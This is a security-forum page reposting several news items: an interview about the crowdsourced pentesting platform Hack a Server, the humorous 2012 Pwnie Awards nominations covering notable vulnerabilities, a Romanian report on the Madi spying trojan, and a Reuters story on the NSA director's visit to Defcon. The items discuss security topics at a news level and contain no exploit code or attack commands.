    One day, being with my little daughter at a doctor and waiting to get in, I was thinking „how can you use gaming in such a way to solve a big problem?” And it strike it me. Online Security Gaming but in another way that it hasn’t been done before. Using the power of crowd source, and not for points (as was done until now), but for real money. After I figured out the outlines, I grabbed the phone, called a friend who’s Sys Admin and asked if he would use such platform and how much would pay for this service. He said yes, he would use such service and he would pay like 1000 Euros. …And here we are. If you think deeper, we solve a few other complementary problems, like hackers that ware black hats, can become grey and start earning real money for what they love most: Hacking Servers. Moreover we fill up a niche between companies that perform penetration tests with high rate cost for small and medium companies and those companies. In fact we don’t even compete with those companies and we complete them. And I can add at least two or three more good things like being sys admin or tester on our platform you get the opportunity if you are in „Hall of Fame” to become consultants on InfoSec issues.

    Building the product

    Who is currently working to bring out HaS platform to the world?

    I’ve tried many, we left few.

    Marius Chis is currently CFO and the first investor in this project. I tried to involve people that fall in love with the project because I’m a strong believer that money is a consequence of a “well done job” and not a purpose.

    Andrei Nistor, is the CTO. He is the one who did the most of the coding part, based on relevant feedback from team members or testers. He worked day and night to get the project working flawless, and made crowdsourcing pentesting possible.

    Alexandru Constantinescu, is the PR & Marketing Executive. He impressed me with his determination when he told me how much loves the project and wants to jump in on marketing side with no initial financial interest, because he understands the development stages of a bootstrap leanstartup company.

    Cosmin Strimbu is our frontend developer. Although I didn’t meet him at the time I’m being interviewed, the same like Alexandru, he just asked me to take him on board. I love this kind of people driven by passion of what they doing and not by money.

    Am I lucky? Yes and no.

    Lucky because They find me (not otherwise) and They find the project. Not lucky because I worked hard to spread the word about me and my projects. No, this is not luck, this is hard work. I have spent over 3 years in online industry, and although I’ve meet a lot of people, I would recommend just a few.

    What is the business model that will bring you revenue from HaS?

    We had a few business models in mind, but since we are dealing with a two sided market place we have decided to charge at a decent percentage those who get paid. That means low rates costs at a fraction comparing with penetration test companies, and we are aiming towards a mass adoption price.

    Who are your customers?

    HaS customers are companies that wants to solve their security issues fast and with low costs. CTOs CIOs CISOs, Sys Administrators, Data Base Administrators, Web Apps Dev are also the professionals within companies that can use our product.

    Other customers are the individual specialists, whether they are PenTesters, Sys Administrators, who want to verify the security of their innovative servers or applications, covered by what we value most, anonymity and confidentiality.

    What are the current features of hackaserver?

    Hack a Server is the next level solution to resolve critical security issues in a funny war game way.

    Cost effective: What can be better for your business than The Power of Crowd Source at cost of a fraction?

    It’s Fast, Reliable and Secure.

    Fast: Within minutes you can setup your server with most popular OS and start to configure. I think we have like 7 clicks to have a machine up and running

    Reliable: Our PenTesters must pass a test and complete a Penetration Test Report to see if they really can be PenTesters before they get access to hack into Playground Arena.

    Secure: At Hack a Server, we encourage you not to disclose your real identity whatever you are a company representative or a pentester. In this way, we don’t keep sensitive data on our platform which means that no matter if someone will try to penetrate our system. They will find nothing.

    What’s next?

    Are there new features to be implemented into the platfom?

    Ha! There are a lot of features that we want to implement. We have a top three features but better for us is to let our customers to decide what they want most. On the second thought we have one that we believe will help CTOs, sys administrators, web apps dev and companies: Finding the best way to automate the process to replicate a physical machine on our platform. Now this is a challenge and we will start as soon as we close this iteration (I think?!).

    How you intend to penetrate the market?

    Hack a Server will become official platform for gamming at DefCamp a premier InfoSec Conference that will held on September 6-8 in Cluj-Napoca City at Hotel Napoca.

    The virtualization module we make it open source so everybody who wants to deploy fast a PenTest lab can free of charge.

    The virtualization module we intend to implement within faculties so the students will have a funny way to learn security.

    Those are a few directions, part of our market strategy.

    Sursa:Hack a Server - The man behind the idea | The Hacker News

  12. Nominations for Pwnie Awards

    Pwnie for Best Client-Side Bug

    Awarded to the person who discovered or exploited the most technically sophisticated and interesting client-side bug. These days, ‘client’ is pretty much synonymous with ‘web browser’, but don't forget about all the media player integer overflows!

    Pinkie Pie's Pwnium Exploit

    Credit: Pinkie Pie

    The Pwnie Award judges were the original bronies. In a blatant attempt at currying their favor, Pinkie Pie chose a handle near and dear to their hearts. How did he know that Pinkie Pie was our favorite? Just slightly less impressive than this feat of clairvoyance was Pinkie Pie's exploit chain of six bugs that got him full remote code execution in Chrome to win Google's Pwnium competition at CanSecWest.

    Sergey Glazunov's Pwnium Exploit

    Credit: Sergey Glazunov

    Not to be outdone by Pinkie Pie, Sergey's Pwnium exploit took advantage of at least 14 bugs (The Chrome security team apparently lost count after that -- numbers are hard). In another show of one-upmanship, he chose a handle of an extremely obscure My Little Pony.

    MS11-087: Unspecified win32k.sys TrueType font parsing engine vulnerability (CVE 2011-3402)

    Credit: Duqu Authors

    As seen in "Stuxnet 2: Electric Duquloo", this 100% reliable kernel-mode remote code execution exploit could rootkit any version of Windows ever from a font file embedded in a web page or various other file formats. What else could you possibly want from a client-side vulnerability? A cookie?

    Flash BitmapData.histogram() Info Leak (CVE 2012-0769)

    Credit: Fermin Serna

    Fermin demonstrated and documented in exquisite detail how to turn a lossy out-of-bounds memory read vulnerability into full chosen-address memory disclosure. He showed how proper heap manipulation and creativity can build a limited exploitation primitive into a much more powerful one. Oh right, we are supposed to make jokes about these. Too bad nothing actually runs Flash.

    iOS Code Signing Bypass (CVE 2011-3442)

    Credit: Charlie Miller

    Hackers are always looking for interesting ways around "the system", whichever one that may be. In this case, Charlie Miller hatched this get-rich-quick idea:

    Write a stock quote app for iOS and put it on the AppStore

    Discover a code signing bypass that allows third-party apps to dynamically download and execute code and use this in his rogue app

    Entice himself to download the app

    Download and inject code into the app to s py on the list of stocks that he was using the app to get quotes for

    Make lucrative trades based on this valuable information

    Unfortunately, before Charlie could profit sufficiently from this information, he talked to the press about his ingenius plot. Apple subsequently pulled his app from the AppStore and from his own iPhone hat had installed it (the only user of the app) as well as banned Charlie from the iOS Developer Program for one year. By doing this, Apple kept Charlie safe from himself for the entire next year.

    Pwnie for Best Server-Side Bug

    Awarded to the person who discovered or exploited the most technically sophisticated and interesting server-side bug. This includes any software that is accessible remotely without using user interaction.

    TNS Poison Attack (CVE-2012-1675)

    Credit: Joxean Koret

    Oracle TNS Listener vulnerabilities bring a tear to our eye. Joxean's attack is basically the forbidden love child between DNS poisoning and those classic TNS Listener vulnerabilities, allowing you to MITM connections to the database from across the Internet.

    ProFTPD Response Pool Use-after-Free (CVE-2011-4130)

    Credit: Anonymous

    Wait, use-after-free bugs exist outside of web browsers? Shame on them for trying to monopolize that bug class. Anyway, this post-auth use-after-free gets you remote code execution on ProFTPD. And that's what dreams are made of. Well, that and puppy tears. Ours are, anyway.

    "Are we there yet?" MySQL Authentication Bypass (CVE-2012-2122)

    Credit: Sergei Golubchik

    On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?"

    "How about now?"

    "Now?"

    For actual details, check out Pwnie Judge extraordinaire HD Moore's blog post.

    WordPress Timthumb Plugin 'timthumb' Cache Directory Arbitrary File Upload Vulnerability (CVE-2011-4106)

    Credit: Mark Maunder

    Here's a tip from some old hands at this game: if the software is named after the author's first name, it is likely INSECURE AS ALL HELL. This design error is case and point. Download files from attacker-specified URLs into a cache directory inside the webroot? Sounds like a great idea to me.

    Pwnie for Best Privilege Escalation Bug

    Awarded to the person who discovered or exploited the most technically sophisticated and interesting privilege escalation vulnerability. As more defense-in-depth systems like Mandatory Access Control and Virtualization are deployed, privilege escalation vulnerabilities are becoming more important. These vulnerabilities can include local operating system privilege escalations, operating system sandbox escapes, and virtual machine guest breakout vulnerabilities.

    Xen Intel x64 SYSRET Privilege Escalation (CVE-2012-0217)

    Credit: Rafal Wojtczuk

    It looks like Intel's x64 SYSRET instruction operates differently enough from AMD's x86_64 standard (some people call this "wrong") that an OS written to the AMD standard running on Intel processors includes a bonus privilege escalation feature. Namely, you can get the kernel (or hypervisor) to handle a SYSRET with a user-specified RSP. What could possibly go wrong?

    Wait, everyone else is vulnerable too?. Bonus in your attackers' favor.

    iOS HFS Catalog File Integer Underflow (CVE-2012-0642)

    Credit: pod2g

    This exploit was used for the Absinthe iOS 5.0/5.0.1 untether. It massaged the kernel heap into submission, copying over the syscall table and giving pod2g (as well as jailbreak users everywhere) a happy ending. And who doesn't love happy endings?

    MS11-098: Windows Kernel Exception Handler Vulnerability (CVE-2011-2018)

    Credit: Mateusz "j00ru" Jurczyk

    j00ru owned Windows. All of them. Ok, well just all of the 32-bit versions of Windows from NT through the Windows 8 Developer Preview. What have you done lately? And to top it off, he wrote a clear paper on it with some of the nicest boxy diagrams we have ever seen in a LaTeX paper.

    VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation (CVE-2012-1515)

    Credit: Derek Soeder

    I'll admit it. The unspecified Pwnie Award judge writing this description never understands any of Derek's bugs and it's getting late and he wants to go to sleep. But Derek's bugs always look big pimpin' and he wishes that he did understand them.

    Pwnie for Most Innovative Research

    Awarded to the person who published the most interesting and innovative research in the form of a paper, presentation, tool or even a mailing list post.

    Packets in Packets: Orson Welles' In-Band Signaling Attacks for Modern Radios

    Travis Goodspeed

    Yo dawg, Travis heard you like packets, so he put packets in packets so that he could inject packets into your internal network from all the way across the Internet. Doesn't sound very neighborly to us, but it's still way cool.

    Smashing the Atom

    Tarjei Mandt

    What did the Windows kernel ever do to Tarjei to deserve the merciless beating he has subjected it to over the last several years? Has he not subjected it to enough pain? Apparently not yet.

    Injecting Custom Payloads Into Signed Windows Executables

    Igor Glucksmann

    Incomplete Code Signing attacks are not only useful for iOS jailbreaks, they can also be used to add a few more features to signed PE executables (i.e. software installers, updates, etc) without invalidating the Authenticode signatures. But why would anyone want to do that?

    The Case for Semantics-Based Methods in Reverse Engineering

    Rolf Rolles

    What you say is more important than how you say it. It turns out that this is true in machine code as well. Rolf's keynote presentation at REcon described how to take approaches from academic program analysis and apply them to real-world reverse engineering challenges.

    Comprehensive Experimental Analyses of Automotive Attack Surface

    Stephen Checkoway, et. al.

    Many hackers have been complaining about the extinction of unmitigated vanilla stack buffer overflows. It turns out that they are not extinct at all, they have all just migrated to YOUR CAR. Stephen Checkoway and the rest of his team identified and exploited these vulnerabilities through a burned CD, paired BlueTooth device, unpaired BlueTooth device, and through a phone call to the car's internal GSM cell phone. Yes, they can call up your car and install malware on it, which they actually implemented (how non-Academic of them). The future is a very scary place. Luckily, the majority of the Pwnie Award judges don't drive. Or use computers. Or phones.

    Pwnie for Lamest Vendor Response

    Coming soon!

    Pwnie for Best Song

    What kind of awards ceremony does not have an award for best song? There is strangely enough a long tradition of hacker-written songs and raps (parodies and originals). And in Pwnies past, we somehow coerced HD and Halvar to rap some of these. And rather then let it become anyone else's turn, we have a new rule. Nominations for 'Best Song' must actually have audio. For your listening pleasure, the nominees are:

    What You Need METASPLOIT!

    Marco Figueroa

    Giving shoutouts to almost all of the Pwnie Award judges definitely helps win a Pwnie nomination (for the record, offerings of 0day work better). Only time will tell if this song is a "certified Pwnie Award winner".

    NYAN

    Who would have thought that C++ method names from MSHTML.DLL could make such a catchy chorus? We never would have.

    The UW CSE Band

    The UW CSE Band has the unique distinction of being the first Best Song nominee that is sung (not rapped) by someone who can actually sing on key. This song, a cover of The Cranberries' "Zombie", gives us flashbacks to the mid-90's when server-side remotes and raver pants were plentiful.

    Give It Some Salt

    beep@bugslap.com

    The LinkedIn breach, explained in rap form.

    Control

    Dual Core

    Written for the Social Engineering Podcast, this song satisfies your corporate social engineering training requirement and you get CISSP points just by listening to it. Just tell your boss that we said so.

    Pwnie for Most Epic FAIL

    Sometimes giving 110% just makes your FAIL that much more epic. And what use would the Internet be if it wasn't there to document this FAIL for all time?

    This award is to honor a person or company's spectacularly epic FAIL. And the nominees are:

    The Anti-Virus Industry

    Anti-Virus Industry

    Do you really need us to elaborate?

    Herpesnet

    Francesco Pompo (aka Frk7)

    Even botmasters have trouble adhering to sound information security practices like choosing strong passwords, auditing their PHP code for vulnerabilities, and limiting the amount of their personal information that is available online. The malware.lu crew took advantage of fails in all of these to track down and dox the botmaster behind the Herpes botnet. If you find that one of your machines is infected with Herpes, ask your doctor what malware.lu can do for you.

    LinkedIn Breach of 6 Million Password Hashes

    LinkedIn

    What has 2500 employees, over 90 million users, no CSO, and hates salt? This company.

    F5 Static Root SSH Key

    F5 Networks

    Including a SSH authentication public key for root on all F5 devices is nice, putting the private key for it in the firmware where it can be found and then used against any other F5 device is even better. For FAIL, press F5.

    Pwnie for Epic 0wnage

    0wnage, measured in owws, can be delivered in mass quantities to a single organization or distributed across the wider Internet population. The Epic 0wnage award goes to the hackers responsible for delivering the most damaging, widely publicized, or hilarious 0wnage. This award can also be awarded to the researcher responsible for disclosing the vulnerability or exploit that resulted in delivering the most owws across the Internet.

    "Flame" Windows Update MD5 Collision Attack

    Flame Authors

    Any attack that requires a breakthrough in cryptography to pull off is pretty cool in our book. And being able to pwn any Windows machine through Windows Update is pretty mass 0wnage.

    Certificate Authorities

    Everyone

    It turns out that Certificate Authorities themselves are one massive security vulnerability. How many more CAs need to get popped before we as an industry realize that allowing Bob's Bait, Tackle, and Certificates to issue wildcard certificates is a bad idea?

    iOS Jailbreaks

    iPhone Dev Team and Chronic Dev Team

    We love the jailbreakers and you should too. They publicly drop all of their exploits as 0day, convince millions of users to disable the security features on their own devices, and then keep those devices vulnerable to the released exploits until new exploits can be developed and released in the patched versions of iOS.

    Sursa:

    Pwnie Awards 2012

  13. Dupa scandalul virusului Flame, inca un virus "politic" a fost descoperit de firmele de securitate IT in Orientul Mijlociu. Virusul Madi sau Mahdi, folosit pentru obtinerea de informatii secrete, a fost depistat in Iran, Israel si Afganistan.

    Peste 800 de PC-uri ale agentiilor guvernamentale, ale institutiilor financiare si companiilor de infrastructura au fost infectate de virusul Madi, sustin expertii Kaspersky Lab si Seculert, potrivit unui comunicat remis HIT.ro.

    In timp ce scopul Flame a fost de a opri programul nuclear din Iran, virusul Madi sau Mahdi, ce este echivalent cu "Mesia" in Islam, are ca scop obtinerea de informatii secrete, de la emailuri si parole pana la transferul de fisiere.

    Troianul Madi permite infractorilor cibernetici sa fure informatii confidentiale de pe computerele cu sisteme de operare Microsoft Windows, sa monitorizeze comunicarea prin email si programele de mesagerie instant, sa inregistreze audio si intrarile din tastatura, precum si sa realizeze capturi de ecran.

    Analiza confirma faptul ca mai multi gigabytes de informatie au ajuns pe serverele infractorilor.

    Printre aplicatiile si paginile web spionate se numara conturile de Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+ si Facebook ale victimelor. Supravegherea era condusa si prin intermediul sistemelor ERP/CRM integrate, a contractelor de business si sistemelor de administrare financiara.

    Noua amenintare malware a fost detectata mult mai usor si are un cod mult mai putin complex decat virusul Flame, considerat cel mai sofisticat din istoria tehnologiei informatice.

    Sursa:

    Flame are un frate: inca un virus "politic" descoperit de firmele de securitate IT | Hit.ro

  14. (Reuters) - Computer geeks attending the world's largest annual hacking party in Las Vegas next week will have a rare chance to rub shoulders with the head of the U.S. National Security Agency.

    General Keith Alexander, director of the spy agency, will speak at the Defcon conference, marking the highest-level visit to date by a U.S. government official to the colorful gathering. Organizers expect some 15,000 hackers this year as they celebrate the 20th anniversary of the first U.S. hacking event that was open to the public.

    The Pentagon disclosed the visit on Friday.

    "We're going to show him the conference. He wants to wander around," said Jeff Moss, a hacker who organized the first Defcon conference while working as a messenger for a Seattle law firm. He now sits on an advisory committee to the Department of Homeland Security.

    Alexander may choose to talk shop with the techies. He holds four master's degrees, including ones in electronic warfare and physics.

    Still, Moss said he expect there could be some controversy over Alexander's presence among the diverse hacker crowd that attends the conference.

    The NSA plays both offense and defense in the cyber wars. It conducts electronic eavesdropping on adversaries, in addition to protecting U.S. computer networks.

    "I expect some people will say 'You are a sellout for having someone from the NSA speak," said Moss, who is known as the Dark Tangent in the hacking community.

    But he doesn't see it that way.

    "One of the things I try to do at Defcon is take some of the hackers out of their comfort zone. I want to expose them to people they would normally not hear from," he said.

    "Don't you think it's important to hear what the most senior person at the NSA has to say? I'm interested in hearing what he has to say," said Moss, whose full-time job is serving as chief security officer with ICANN, the Internet Corporation for Assigned Names and Numbers, which helps manage the infrastructure for much of the Internet.

    Hackers come to the conference to exchange information about tools of the trade, socialize and compete in hacking contests.

    There will be talks on attacking mobile phones and Google TV, more technical discussions on programming and discussions about government surveillance.

    Defcon offers a side conference for children, Defcon Kids, which Alexander will likely visit. It also trains hackers to pick locks and has an annual contest to measure who is best at persuading corporate workers to release sensitive data over the phone.

    Moss said he invited federal agents to the first Defcon conference, but that they politely declined. They showed up anyway, incognito. They kept coming, in bigger numbers, sometimes in uniform.

    "We created an environment where the feds felt they could come and it wasn't hostile," Moss said. "We could ask them questions and they wanted to ask the hackers about new techniques."

    He said he's spent a decade trying to get the head of the NSA to speak at Defcon, but he never imaged it would actually happen: "To me this is really validating of the whole culture."

    Sursa:

    U.S. spy agency chief to meet with hackers at Defcon | Reuters

×
×
  • Create New...